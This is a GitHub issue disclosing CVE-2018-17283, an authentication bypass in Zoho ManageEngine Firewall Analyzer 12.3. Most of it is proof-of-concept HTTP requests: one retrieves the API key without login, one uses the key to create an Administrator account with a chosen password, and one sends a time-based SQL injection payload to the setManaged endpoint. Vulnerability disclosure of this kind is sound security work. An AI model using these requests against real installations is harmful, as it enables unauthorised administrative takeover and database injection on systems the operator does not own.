Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[CVE-2018-17283]Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection #4

Open
x-f1v3 opened this issue Sep 20, 2018 · 0 comments

Comments

@x-f1v3
Copy link
Owner

x-f1v3 commented Sep 20, 2018

Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection

Date: 2018/09/03
Software Link: https://www.manageengine.com/products/firewall/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn

Firewall Analyzer 12.3 Build 123183 has permission bypass Vulnerability which can lead to information disclosure and SQL injection

Proof of Concept:

Getting the apikey unauthorizedly:

GET /oputilsServlet?action=getAPIKey HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

Local site test:
image

Add the admin user by only using the apikey poc:

POST /api/json/v2/admin/addUser?apiKey=f1fdf3746bb68570c1cb28610f7ebee5&userName=test1@test.com&privilege=Administrator&emailId=test@test.com&landLine=1&mobileNo=1&sipenabled=true&tZone=Asia/Irkutsk&allDevices=true&authentication=local&fwaresources=&ncmallDevices=true HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US;q=0.8,en;q=0.3
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/apiclient/ember/index.jsp
Content-Length: 566
Content-Type: multipart/form-data; boundary=---------------------------195342410120122
Connection: close

-----------------------------195342410120122
Content-Disposition: form-data; name="DevGroup"


-----------------------------195342410120122
Content-Disposition: form-data; name="IPGroup"


-----------------------------195342410120122
Content-Disposition: form-data; name="InterfaceGroup"


-----------------------------195342410120122
Content-Disposition: form-data; name="password"

test123
-----------------------------195342410120122
Content-Disposition: form-data; name="profileImg"

undefined
-----------------------------195342410120122--

Local site test:
image
image

Sql injection by only using the apikey poc:

POST /api/json/device/setManaged?apiKey=f1fdf3746bb68570c1cb28610f7ebee5&manage=false HTTP/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.159.1:80
Host: 192.168.159.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

name=KcP7OGhC';select%20pg_sleep(1);%20-- 

image

image

@x-f1v3 x-f1v3 changed the title Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection [CVE-2018-17283]Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection Sep 29, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant